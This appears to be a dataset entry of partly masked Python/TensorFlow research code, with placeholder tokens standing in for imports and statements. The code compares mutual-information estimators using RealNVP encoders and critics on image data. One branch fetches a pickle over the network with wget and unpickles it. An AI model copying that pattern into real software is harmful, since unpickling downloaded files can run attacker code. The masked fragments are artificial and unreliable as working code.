token>\nprint('Fit on half the pixels: {}. It should be around 0.835.'.format(\n logistic_fit(x_train_noisy[:, :DIMS // 2], y_train, x_test_noisy[:, :\n DIMS // 2], y_test)))\n\n\ndef processed_train_data(dims, batch_size):\n dataset = load_data('train')\n dataset_batched = dataset.repeat().batch(batch_size, drop_remainder=True)\n get_next = tf.compat.v1.data.make_one_shot_iterator(dataset_batched\n ).get_next()\n features = get_next[FEATURE_INPUT]\n labels = get_next[FEATURE_LABEL]\n x_1, x_2 = tf.split(features, [dims, DIMS - dims], axis=-1)\n return x_1, x_2, labels\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\nif RUN_EXPERIMENTS:\n data_invertible = run_all_experiments()['df']\n data_invertible.to_pickle(RESULT_DIR)\nelse:\n os.system(\n 'wget -q -N https://storage.googleapis.com/mi_for_rl_files/mi_results.pkl'\n )\n data_invertible = pd.read_pickle('mi_results.pkl')\n data_invertible = data_invertible[data_invertible.exp_name == 'invertible']\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\ndef nwj_lower_bound(scores):\n return tuba_lower_bound(scores - 1.0)\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\[email protected]\ndef adap_pred_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n pre_prob = (1.0 - alpha) * pre_prob + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\ndef load_data(split):\n return tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split\n ).cache().map(map_func=map_fn).shuffle(1000)\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n\n\ndef processed_train_data(dims, batch_size):\n dataset = load_data('train')\n dataset_batched = dataset.repeat().batch(batch_size, drop_remainder=True)\n get_next = tf.compat.v1.data.make_one_shot_iterator(dataset_batched\n ).get_next()\n features = get_next[FEATURE_INPUT]\n labels = get_next[FEATURE_LABEL]\n x_1, x_2 = tf.split(features, [dims, DIMS - dims], axis=-1)\n return x_1, x_2, labels\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], 